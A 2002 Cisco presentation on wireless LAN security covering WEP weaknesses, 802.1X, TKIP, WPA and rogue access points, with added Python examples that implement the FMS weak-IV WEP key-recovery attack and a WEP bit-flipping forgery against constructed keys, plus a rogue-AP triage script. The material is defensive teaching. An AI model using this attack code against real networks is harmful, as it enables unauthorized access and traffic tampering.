Wireless LAN Security
© 2002, Cisco Systems, Inc.

Page 1: Wireless LAN Security

Page 2: The #1 Concern for Enterprise about Wireless: Security

Source: WSJ, 2/5/01

Page 3: Agenda

• Wireless LAN security issues
• Standards-based solutions: 802.1X and TKIP
• Wi-Fi Protected Access (WPA)
• Other security methods
• Rogue APs
• Demo
• Summary

Page 4: Security Requirements for WLANs

“Wireless is like having an RJ45 in my car park”

Page 5: Wireless LAN Security Issues

(Figure: a wireless LAN; the client talks to the access point (AP) over the air, and the AP is bridged to the wired LAN.)

Issue
• Access control: anyone in the AP coverage area can get on the WLAN
• Privacy: a wireless sniffer can view all WLAN data packets

802.11 solution
• Use WEP to encrypt all data transmitted between client and AP
• Without the WEP key, a user cannot transmit or receive data

Page 6: Limitations of 802.11 Security

Authentication
• Authentication is device-based, not user-based
• Client does not authenticate the network
• Existing authentication databases are not leveraged

Key management
• Keys are static
• Keys are shared among devices and APs
• If an adapter or device is stolen, all devices and APs must be rekeyed

RC4-based WEP keys
• Encryption algorithm is vulnerable to attack
• Message integrity is not ensured

Page 7: Addressing the Limitations: 802.11i

802.1X addresses the authentication and key management limitations:

Authentication
• Authentication is device-based, not user-based
• Client does not authenticate the network
• Existing authentication databases are not leveraged

Key management
• Keys are static
• Keys are shared among devices and APs
• If an adapter or device is stolen, all devices and APs must be rekeyed

TKIP and AES address the RC4-based WEP key limitations:
• Encryption algorithm is vulnerable to attack
• Message integrity is not ensured

Page 8: Overview of 802.1X

• Link layer (layer 2) support for the Extensible Authentication Protocol (EAP)
• Securely facilitates authentication message exchanges between:
  – Wireless client
  – Access point
  – AAA server
• Allows the use of numerous authentication algorithms
• WLAN implementations of 802.1X must support mutual authentication

Page 9: 802.1X Authentication Types

• EAP-Cisco Wireless, or LEAP
  – Supported by Cisco Aironet client adapters on Windows, CE, Linux, Mac OS, and DOS
  – Has been licensed to other vendors
• EAP-TLS (mutual EAP-TLS)
  – Supported in XP and, soon, other Windows versions
  – Requires client certificates and server certificates
• PEAP
  – Supported in XP and, soon, other Windows versions
  – Uses server-side TLS, which requires only server certificates
  – The client must validate that server certificate (trusted CA, expected server name); otherwise it has not authenticated the network and the mutual-authentication requirement on the previous page is not met
• EAP-TTLS
  – Supported by Funk Software’s Odyssey
  – Uses server-side TLS, with the same server-certificate validation caveat as PEAP

Page 10: Overview of the Cisco Temporal Key Integrity Protocol (TKIP)

• WEP is broken: the AirSnort attack, among others, renders WEP ineffective
• TKIP is designed to “patch” WEP; it is not the long-term WLAN encryption solution
• Allows existing devices to be upgraded

Page 11: WEP: AirSnort “Weak IV” Attack

• Attack is based on the Fluhrer/Mantin/Shamir paper
• The initialization vector (IV) is a 24-bit field that changes with each packet
• WEP prepends the IV to the base key and feeds the concatenation to the RC4 Key Scheduling Algorithm as the per-packet key
• Because the IV is sent in the clear and forms the first bytes of the RC4 key, certain “weak” IVs make the first keystream byte give insight into the base key
• More packets = more weak IVs = better chance to determine the base key
• To break the key, a hacker needs 5-6 million packets

WEP frame: dest addr | src addr | IV | encrypted data
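The mechanics behind the bullets above, as an added example that is not code from this deck or from AirSnort. It implements RC4, builds the WEP per-packet key as IV || base key, and runs the Fluhrer/Mantin/Shamir key-byte recovery: for each key byte index B the attacker simulates the key schedule over the bytes it already knows, keeps only "resolved" IVs, and uses the first keystream byte (known because every WEP frame starts with the 0xAA LLC/SNAP byte) to vote for the next key byte. Two simplifications are assumptions of the example: the attacker asks a constructed oracle (`wep_encrypt_first_byte`) for frames under the classic weak IVs (B, 255, X) and (B, 254, X) instead of waiting for them in captured traffic, which is what the 5-6 million packet figure on the slide accounts for, and the base key is a constructed 40-bit value. TKIP's key hashing removes exactly the IV-is-the-key-prefix structure this relies on.

```python
"""Toy reconstruction of the Fluhrer/Mantin/Shamir (FMS) weak-IV attack on WEP.
Added example, not code from the Cisco deck or from AirSnort."""
from collections import Counter

# Every WEP data frame starts with the LLC/SNAP header, so the first plaintext
# byte (0xAA) is known to the attacker and yields the first keystream byte.
SNAP_FIRST_BYTE = 0xAA


def rc4_ksa(key):
    """RC4 Key Scheduling Algorithm: permute S under the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n keystream bytes (PRGA) for the given key."""
    S = rc4_ksa(key)
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return out


def wep_encrypt_first_byte(iv, secret):
    """Sender side: the WEP per-packet key is IV || base key (the flaw).
    Returns the first ciphertext byte of a frame sent under this IV."""
    return rc4_keystream(bytes(iv) + secret, 1)[0] ^ SNAP_FIRST_BYTE


def fms_vote(iv, known_prefix, z0):
    """Attacker side: one vote for key byte K[B], B = 3 + len(known_prefix).
    Runs the KSA over the B known key bytes; if the IV is 'resolved' (S[1] and
    S[S[1]] already settled and summing to B) the first keystream byte z0 equals
    S[B] after step B with probability about 5%, which exposes K[B]."""
    known = list(iv) + list(known_prefix)
    B = len(known)
    S = list(range(256))
    j = 0
    for i in range(B):
        j = (j + S[i] + known[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= B or S[1] + S[S[1]] != B:
        return None  # not a weak IV for this key byte
    # z0 = S[j_B] before the swap at step B, so index(z0) recovers j_B and K[B].
    return (S.index(z0) - j - S[B]) & 0xFF


def recover_wep_key(first_byte_oracle, key_len):
    """Recover the base key byte by byte. For byte index B the classic weak IVs
    (B, 255, X) and (B, 254, X) are requested from the oracle; a real attacker has
    to wait for them to appear in traffic, hence the millions of sniffed packets."""
    secret = []
    for B in range(3, 3 + key_len):
        votes = Counter()
        for second in (255, 254):
            for x in range(256):
                iv = (B, second, x)
                z0 = first_byte_oracle(iv) ^ SNAP_FIRST_BYTE
                guess = fms_vote(iv, secret, z0)
                if guess is not None:
                    votes[guess] += 1
        secret.append(votes.most_common(1)[0][0])
    return bytes(secret)


if __name__ == "__main__":
    # Constructed 40-bit base key; the attacker only sees IVs and ciphertext bytes.
    base_key = bytes([0x1F, 0x2E, 0x3D, 0x4C, 0x5B])
    print(recover_wep_key(lambda iv: wep_encrypt_first_byte(iv, base_key), 5).hex())
```

Each resolved IV gives the right byte only about 5% of the time, so the recovery works by tallying votes; 512 chosen IVs per byte leave the correct value far ahead of the noise. With passively sniffed traffic the attacker gets one usable IV per few thousand frames, which is the gap between this toy and the millions of packets AirSnort needs.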

Page 12: WEP: Bit-Flipping and Replay Attack

• Hacker intercepts a WEP-encrypted packet
• Hacker flips bits in the packet and recalculates the ICV (CRC-32); because CRC-32 is linear, the corrected ICV can be computed from the flipped bits alone, without the key
• Hacker transmits the bit-flipped frame, with the known IV, to the AP
• Because the CRC-32 is correct, the AP accepts and forwards the frame
• The layer 3 device rejects it and sends a predictable response
• The AP encrypts the response and sends it to the hacker
• Hacker XORs the predicted plaintext with the ciphertext to recover the keystream for that IV (the stream cipher output), which decrypts every other frame sent under the same IV

(Figure: plain text 1234 XOR stream cipher = cipher text XXYYZZ; cipher text XXYYZZ XOR predicted plain text 1234 = stream cipher.)

Page 13: TKIP: Key Hashing (Per-Packet Keys)

No key hashing (WEP): IV || base key → RC4 → stream cipher; stream cipher XOR plaintext data → encrypted data. The IV is transmitted in the clear with the encrypted data.

Key hashing (TKIP): hash(IV, base key) → packet key; packet key → RC4 → stream cipher; stream cipher XOR plaintext data → encrypted data. The IV is still transmitted in the clear.

Because the packet key is a hash of the IV and the base key, the IV no longer gives insight into the base key.

Page 14: TKIP: Message Integrity Check (MIC)

WEP frame: dest addr | src addr | IV | [ seq # | plaintext | MIC | ICV ] XOR stream cipher

• Sender adds a sequence number and a MIC to the packet before encryption
• Recipient examines the MIC and discards the packet if the MIC is not intact
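An added example covering both the bit-flipping attack on Page 12 and the MIC on this page; it is not code from the deck or from the TKIP specification. The WEP part shows why the ICV gives no integrity: an attacker XORs a change into the encrypted payload and patches the encrypted ICV using only the linearity of CRC-32, so the receiver's check passes without the attacker knowing the key. The second part puts a sequence number and a keyed MIC inside the encrypted body, in the layout of the figure above, and the receiver drops both the forged frame and a replayed one. Assumptions: a fixed byte string stands in for the RC4 keystream that one IV plus base key would produce, a truncated HMAC-SHA256 stands in for TKIP's Michael MIC, and the frame contents and keys are constructed.

```python
"""Why WEP's CRC-32 ICV gives no integrity, and how a keyed MIC plus a sequence
counter does. Added example, not code from the Cisco deck or from TKIP."""
import hashlib
import hmac
import zlib

# Constructed stand-in for the RC4 keystream that one IV + base key would produce.
# The attacker never needs to know it; only sender and receiver share it.
KEYSTREAM = hashlib.sha256(b"constructed stand-in keystream").digest() * 4

# Constructed stand-in for the per-association MIC key TKIP derives from the session key.
MIC_KEY = b"constructed MIC key"

LLC_SNAP = bytes.fromhex("aaaa03000000")  # starts every 802.11 data frame payload


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP ICV: CRC-32 of the plaintext, transmitted little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_protect(plaintext):
    """Sender: encrypt plaintext || ICV with the stream cipher."""
    return xor(plaintext + icv(plaintext), KEYSTREAM)


def wep_verify(ciphertext):
    """Receiver: decrypt and accept only if the ICV matches. Returns plaintext or None."""
    body = xor(ciphertext, KEYSTREAM)
    plaintext, tag = body[:-4], body[-4:]
    return plaintext if tag == icv(plaintext) else None


def flip_bits(ciphertext, delta):
    """Attacker: XOR delta into the encrypted payload and patch the encrypted ICV.
    CRC-32 is affine, crc(m ^ d) == crc(m) ^ crc(d) ^ crc(zeros), so the ICV
    correction depends only on delta: neither key nor keystream is needed."""
    n = len(ciphertext) - 4
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))).to_bytes(4, "little")
    return xor(ciphertext, delta + icv_delta)


def mic_protect(plaintext, seq):
    """TKIP-style sender, layout as on the slide: seq # || plaintext || MIC,
    then the ICV, everything under the stream cipher. Truncated HMAC-SHA256
    stands in for TKIP's Michael MIC."""
    hdr = seq.to_bytes(2, "big")
    mic = hmac.new(MIC_KEY, hdr + plaintext, hashlib.sha256).digest()[:8]
    return wep_protect(hdr + plaintext + mic)


class MicReceiver:
    """Drops frames whose MIC fails or whose sequence number does not advance (replay)."""

    def __init__(self):
        self.last_seq = -1

    def accept(self, ciphertext):
        body = wep_verify(ciphertext)
        if body is None:
            return None
        hdr, plaintext, mic = body[:2], body[2:-8], body[-8:]
        expected = hmac.new(MIC_KEY, hdr + plaintext, hashlib.sha256).digest()[:8]
        seq = int.from_bytes(hdr, "big")
        if not hmac.compare_digest(mic, expected) or seq <= self.last_seq:
            return None
        self.last_seq = seq
        return plaintext


def demo():
    """Flip 'index' to 'admin' in a WEP frame without the key, then show the
    same flip and a replay failing against the MIC-protected frame."""
    msg = LLC_SNAP + b"GET /index.html"  # constructed frame payload
    off = len(LLC_SNAP) + len(b"GET /")
    delta = bytes(off) + xor(b"index", b"admin") + bytes(len(msg) - off - 5)
    forged_wep = wep_verify(flip_bits(wep_protect(msg), delta))
    rx = MicReceiver()
    ok = rx.accept(mic_protect(msg, 1))
    replay = rx.accept(mic_protect(msg, 1))
    forged_mic = rx.accept(flip_bits(mic_protect(msg, 2), bytes(2) + delta + bytes(8)))
    return forged_wep, ok, replay, forged_mic


if __name__ == "__main__":
    print(demo())
```

The forged WEP frame decrypts to the attacker's chosen text and passes the ICV check; the same manipulation on the MIC-protected frame still passes the ICV (the attacker can always fix that) but fails the MIC, and the duplicate frame is rejected on its sequence number. The point carries over to any stream cipher: without a keyed integrity check, encryption alone does not stop modification.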

Page 15: Broadcast Key Rotation Overview

• A broadcast key is required in 802.1X environments
• Re-keying of the broadcast key is necessary, just as with the unicast key
• The key is delivered to the client encrypted with the client’s dynamic key

Page 16: AirSnort

– Capture enough packets
– A passive listener can recover the secret WEP key by listening to enough packets
– Enough = 5-6 million packets

<while running>

Airsnort capture v0.0.9
Copyright 2001, Jeremy Bruestle & Blake Hegerle
Total Packets : 2096201300
Encrypted Packets: 1009835030000
Interesting Packets: 0
Timeouts: 0
Last IV = 00:50:DA

“Has anyone had any luck with snorting against a Cisco 340 Access Point with 11.07? I have been running against one all day and according to capture I have 60 billion encrypted packets but 0 interesting packets.” - Toby Bearden, hacker, in posting to Airsnort Forum

Page 17: WPA

• What? WPA = 802.1X + TKIP
  – A non-802.1X option exists for home/SOHO products¹
• Why?
  – 802.1X and TKIP are key elements of 802.11i
  – Industry is tired of waiting for 802.11i to be ratified
  – Responding to a push from Microsoft, the Wi-Fi Alliance agreed to incorporate WPA into Wi-Fi compliance testing
• When?
  – Optional testing begins in February 2003
  – WPA compliance is needed for new Wi-Fi certification beginning in August 2003
• Result: WPA is the new industry baseline for WLAN security

¹ http://www.wi-fi.com/OpenSection/pdf/WPA_Home_Overview.pdf
Overview: http://www.wi-fi.com/OpenSection/pdf/Wi-Fi_Protected_Access_Overview.pdf
Q&A: http://www.wi-fi.com/OpenSection/pdf/Wi-Fi_Protected_Access_QA.pdf

Page 18: Cisco and WPA

• Current capabilities of Cisco Aironet products
  – Have supported 802.1X since December 2000
  – Have supported a pre-standard TKIP implementation since December 2001
• Cisco plans*
  – Continue to support all 802.1X types, including LEAP, as well as pre-standard TKIP
  – Ensure WPA compliance, primarily by adding support for standard TKIP
  – VLANs can be used for mixed client environments

* Not committed

Page 19: Security using VPN

(Figure: a wireless user at a hotel/airport reaches the enterprise over a high-speed Internet connection; the VPN terminates at the enterprise firewall, giving a secure intranet connection.)

Page 20: WLAN Security Hierarchy

(Figure: four tiers, lowest to highest.)
• Open Access: no encryption, basic authentication. Public “hotspots”
• Basic Security: 40-bit or 128-bit static WEP encryption. Home use
• Enhanced Security: 802.1x, TKIP/SSN encryption, mutual authentication, scalable key management, etc. Business
• Remote Access: Virtual Private Network (VPN). Business traveler, telecommuter

Page 21: VLAN concepts – the wireless world

(Figure: AP_1 and AP_2 each connect to the enterprise network over an 802.1Q trunk with native VLAN = 10, the management VLAN (VLAN-id 10); a RADIUS server sits on the enterprise network; each AP advertises the SSIDs Engineering, Marketing, HR and Guest.)

SSID         VLAN-id   Security policy                    RADIUS VLAN override (optional, per user)
Engineering  14        802.1x with dynamic WEP + TKIP     yes
Marketing    24        802.1x with dynamic WEP + TKIP     yes
HR           34        802.1x with dynamic WEP + TKIP     no
Guest        44        Open/no WEP                        no

Page 22: The problem with rogue APs…

• Wireless APs can be deployed securely
  – 802.1x with TKIP
  – VPN
• Rogue APs do not conform to corporate security requirements and open the network to trespassers, snoops, and hackers

“Rogue APs are like having an RJ45 in my car park.” (the Page 4 quote, with “Wireless is” struck through and replaced by “Rogue APs are”)

Page 23: Who installs Rogue APs? – “Focus on the Frustrated Insider”

Frustrated insider (“Jones from accounting”, >99.9% of rogue APs)
• User that installs a wireless AP in order to benefit from the increased efficiency and convenience it offers
• Common because of the wide availability of low-cost APs
• Usually ignorant of AP security configuration; default configuration most common

Malicious hacker (“James Bond”, <0.1% of rogue APs)
• Penetrates physical security specifically to install a rogue AP
• Can customize the AP to hide it from detection tools
• Hard to detect; more effective to prevent via 802.1x and physical security
• More likely to install a Linux box than an AP

Page 24: Media Attention to Rogue APs: Wardriving

Pringles can antenna
• 12 dBi gain
• 45 minutes to construct
• $6.45 total cost
http://www.oreillynet.com/cs/weblog/view/wlg/448

• 12,600 hits on Google for wardriving
• Most wardrivers use NetStumbler to find, map (using GPS), and upload locations of discovered APs to an online database
• NetStumbler is a free download for Windows and WinCE

War Driving (wôr dri'vin) v. 1. Driving around looking for unsecured wireless networks. – term coined by Pete Shipley
http://www.wirelesscentral.net/aprod/STUM-ANTW.html?ns

Page 25: NetStumbler in use – 59 APs in 7 miles

• My daily drive to work, taken within the car at normal speeds with an iPAQ running NetStumbler with an integrated PCMCIA antenna
• In addition to the AP MAC address and SSID, the following information is available with NetStumbler:
  – 802.11 channel
  – Signal-to-noise ratio (SNR)
  – Latitude/longitude (if a GPS is connected)
  – More…

(Figure: NetStumbler screenshot listing the SSIDs of the 59 APs found, with WEP on/off flagged for each.)
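What to do with a survey like the one above, as an added example that is not code from the deck or from NetStumbler: compare each observed AP (BSSID, SSID, channel, SNR, WEP flag) against the inventory of IT-deployed APs and sort the rest into neighbours, insider rogues with factory defaults, and the case worth escalating first, an unknown radio advertising a corporate SSID. The record format, the inventory, the default-SSID list and the survey lines are constructed for the example; NetStumbler's own export format is not reproduced, and the SNR threshold is a tunable assumption.

```python
"""Rogue AP triage over a wireless survey: compare what a NetStumbler-style
drive or walk found against the inventory of IT-deployed APs. Added example;
the record format, inventory and survey lines are constructed, not NetStumbler output."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    bssid: str
    ssid: str
    channel: int
    snr_db: int
    wep: bool


# Constructed inventory of IT-deployed APs: BSSID -> (SSID, channel).
AUTHORIZED = {
    "00:40:96:4A:10:01": ("Engineering", 1),
    "00:40:96:4A:10:02": ("Marketing", 6),
}
CORPORATE_SSIDS = {ssid for ssid, _ in AUTHORIZED.values()}

# Factory-default SSIDs (constructed list): the "frustrated insider" rarely changes them.
DEFAULT_SSIDS = {"linksys", "default", "tsunami", "wireless"}

# Below this SNR an unknown AP is probably off-site; assumed value, tune per building.
NEIGHBOR_SNR_DB = 10


def parse_survey(text):
    """Parse constructed 'bssid,ssid,channel,snr_db,wep' lines into Observations."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        bssid, ssid, channel, snr, wep = (f.strip() for f in line.split(","))
        records.append(Observation(bssid.upper(), ssid, int(channel), int(snr), wep.lower() == "on"))
    return records


def classify(obs):
    """Return (verdict, reason) for one observed AP."""
    if obs.bssid in AUTHORIZED:
        ssid, channel = AUTHORIZED[obs.bssid]
        if obs.ssid != ssid or obs.channel != channel:
            return "tampered", f"inventory says {ssid!r} on channel {channel}"
        return "authorized", "in inventory"
    if obs.ssid in CORPORATE_SSIDS:
        # Unknown radio advertising our SSID: the case the 802.1X mutual-authentication
        # requirement exists for, and the one to check before anything else.
        return "impersonation", "corporate SSID from a BSSID not in inventory"
    if obs.snr_db < NEIGHBOR_SNR_DB:
        return "neighbor", "weak signal, probably outside the building"
    reasons = ["unknown AP with strong signal"]
    if obs.ssid.lower() in DEFAULT_SSIDS:
        reasons.append("factory-default SSID")
    if not obs.wep:
        reasons.append("WEP off")
    return "rogue", "; ".join(reasons)


def triage(text):
    """Map BSSID -> (verdict, reason) for every AP in the survey."""
    return {obs.bssid: classify(obs) for obs in parse_survey(text)}


# Constructed sample survey, not a real NetStumbler capture.
SAMPLE_SURVEY = """
# bssid,ssid,channel,snr_db,wep
00:40:96:4a:10:01,Engineering,1,38,on
00:40:96:4a:10:02,Marketing,6,35,on
00:0c:41:7e:22:9f,linksys,6,31,off
00:02:2d:1b:cc:40,Engineering,11,29,off
00:0c:41:aa:bb:cc,cafe-wifi,1,6,off
"""

if __name__ == "__main__":
    for bssid, (verdict, reason) in sorted(triage(SAMPLE_SURVEY).items()):
        print(f"{bssid}  {verdict:<14} {reason}")
```

The "tampered" verdict will fire on legitimate channel changes if the APs auto-select channels, so keep the inventory's channel field current or drop that comparison. This only finds APs that beacon; the "malicious hacker" case on Page 23 that hides from detection tools is why the summary puts 802.1x on the switch ports, which stops the rogue device at the wire regardless of what its radio advertises.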

Page 26: Media Attention to Rogue APs: Warchalking

What is warchalking?
• Warchalking is the process of looking for wireless computer networks and making chalk marks to indicate their locations so that others can more easily find them.
• http://www.warchalking.org/ – online community containing descriptions and photos of warchalked sites
• 12,100 hits on Google for “warchalking”

Page 27: Summary…

• You probably already have a WLAN deployment in your corporate network (whether you know it or not)
• An IT-deployed and IT-supported WLAN is the best way to prevent insiders from installing their own APs
• 802.1x on the switched infrastructure prevents rogue devices
  – Effective against all classes of unauthorized access (frustrated insider and “malicious hacker”)
  – Allows identity-based policy on the switch port
• Do your own “war walking”

Page 28: Questions?
